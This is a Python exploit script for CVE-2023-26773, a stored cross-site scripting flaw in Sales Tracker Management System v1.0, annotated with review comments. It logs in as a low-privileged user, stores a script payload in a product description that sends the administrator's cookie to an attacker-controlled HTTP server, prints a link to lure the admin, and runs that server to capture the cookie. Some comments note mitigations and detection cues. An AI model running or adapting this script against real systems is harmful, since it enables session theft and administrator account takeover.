# Exploit Title: Sales Tracker Management System v1.0 - One click account takeover XSS  
# Exploit Author: Achuth V P (retrymp3)  
# Date: February 08, 2023  
# CVE: CVE-2023-26773  
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code  
# Tested on: Ubuntu, Apache, Mysql  
# Vendor: oretnom23  
# Version: v1.0  
# Exploit Description: Sales Tracker Management System v1.0 suffers from a stored cross-site scripting (XSS) vulnerability that results in one-click account takeover by stealing the administrator's cookies.
  
import requests  
from requests.auth import HTTPBasicAuth  
import http.server  
import socketserver  
import argparse  
from colorama import (Fore as F, Back as B, Style as S)  
# Short aliases for the colorama colour/style codes used by the banner and
# status output below (F = Fore, B = Back, S = Style).
BR = B.RED
FT = F.RESET
FR = F.RED
FG = F.GREEN
FY = F.YELLOW
FB = F.BLUE
FM = F.MAGENTA
FC = F.CYAN
ST = S.RESET_ALL
SD = S.DIM
SB = S.BRIGHT
  
  
def expServer():
    """Serve the current working directory over plain HTTP and block forever.

    Binds every interface ("") on PORT. SimpleHTTPRequestHandler logs each
    incoming request line (to stderr by default), which is the only place the
    request described in payL() would be visible. Note that everything in the
    working directory is exposed to anyone who can reach the port.
    """
    PORT = 8000  # You can change.
    handler_cls = http.server.SimpleHTTPRequestHandler
    server = socketserver.TCPServer(("", PORT), handler_cls)
    with server as httpd:
        print("serving at port", PORT)
        httpd.serve_forever()
  
def auth():
    """Log in to the application as a low-privileged user.

    Reads a username and password from stdin and POSTs them as form fields to
    ``classes/Login.php?f=login`` under the module-level ``url`` (assigned in
    the ``__main__`` block). Returns nothing and does not check the result.
    """
    print("Enter the username and password for a normal user")
    user = input("Username: ")
    # NOTE(review): input() echoes the password on the terminal; getpass would not.
    passwd = input("Password: ")
    # Built but never used: the request below authenticates with a form POST,
    # not HTTP Basic auth. The local name also shadows this function.
    auth = HTTPBasicAuth(user, passwd)
    params = {'username': user, 'password': passwd}
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    #proxies=proxies give it as an argument to requests.get() to proxy it through burp.
    # The response is never inspected, so a failed login goes unnoticed here.
    # Path is joined without a leading '/', unlike payL(); the two should agree.
    req = requests.post(url + 'classes/Login.php?f=login', data=params)
  
def payL():
    """Store the XSS payload in a product record via the save_product endpoint.

    The multipart fields mirror the product form; ``description`` carries the
    script. The advisory header states that the stored value is later rendered
    to the administrator (admin/products/view_product.php) without output
    encoding — that missing encoding is the root cause. Uses the module-level
    ``url``.
    """
    # Path is joined with a leading '/' here but without one in auth(); only
    # one form can be right for a given ``url`` value.
    tf = requests.post(url + '/classes/Master.php?f=save_product',
        files=(
            ('id', (None, '1')),
            ('code', (None, '123456')),
            ('name', (None, 'xssssssREssss')),
            # Stored-XSS sink. Mitigations on the application side: HTML-encode
            # this field on output, and mark the session cookie HttpOnly so
            # document.cookie cannot read it. Detection opportunity: an outbound
            # request from the admin's browser carrying a ``cookie=`` query
            # parameter, plus a product record containing a <script> tag.
            ('description', (None, '<script>document.location="http://0.0.0.0:8000/?cookie="+document.cookie</script>')),
            ('price', (None, '355.19')),
            ('status', (None, '1'))
        )
    )
    # requests.Response is truthy whenever the status is < 400 (``Response.ok``),
    # so this only shows the request was accepted, not that the record was saved.
    if (tf):
        print("Send this to admin: " + FR + url + "admin/products/view_product.php?id=1" + FR + "\n")
        print(FC + "When admin clicks on the link you can see admin's cookie in the request log of the python server" + FY + "\n")
    else:
        print("Bad request. Check the url")
  
def bullet(char, color):
    """Return a bright, coloured ``[char] `` marker for status lines.

    ``color`` 'B' selects blue and 'R' red; any other value falls back to
    green. Not called anywhere in this listing.
    """
    palette = {'B': FB, 'R': FR}
    tint = palette.get(color, FG)
    return SB + tint + '[' + ST + SB + char + SB + tint + ']' + ST + ' '
  
  
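def sig():
    """Return the ASCII-art author banner printed by the CLI header.

    Colour codes come from the module-level colorama aliases (SB, FY, FR, ST).
    The output is identical to the original concatenation; the only change is
    that literal backslashes are escaped explicitly so Python no longer warns
    about invalid escape sequences such as "\\ " and "\\_".
    """
    lines = [
        SB + FY + " " + FR + ".-----..___.._____. " + FY + "\n",
        FY + " | .. >||__-__-_| \n",
        FY + " " + FR + "| |.' ,||_______ " + FY + "\n",
        FY + " | _ < ||__-__-_|" + FR + "* * *" + FY + " \n",
        FY + " | |\\ \\ ||__-__-_\n",
        FY + " " + FR + "|___ \\_ \\||_______| " + FY + "\n",
        FY + "\n" + " _____" + FR + "github.com/retrymp3" + FY + "_____\n" + ST,
    ]
    return "".join(lines)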
  
def argsetup():
    """Return the one-line, bright tool description shown under the banner.

    Despite the name, no argparse parser is built here; the base URL is read
    interactively in the ``__main__`` block.
    """
    title = 'Admin account takeover - Sales Tracking Manager v1.0\n'
    return SB + FT + title + ST
  
  
if __name__ == "__main__":
    # Banner, ASCII-art signature and tool description.
    header = SB + FT + "\n" + ' ' + FR + 'retrymp3\n' + ST
    print(header)
    print(sig())
    print(argsetup())
    # Module-level global read by auth() and payL(). No trailing-slash
    # normalisation is done, although those two functions join their paths
    # differently ('classes/...' vs '/classes/...').
    url = input("Enter the base url: ")
    auth()
    payL()
    # Blocks here until interrupted (serve_forever never returns on its own).
    expServer()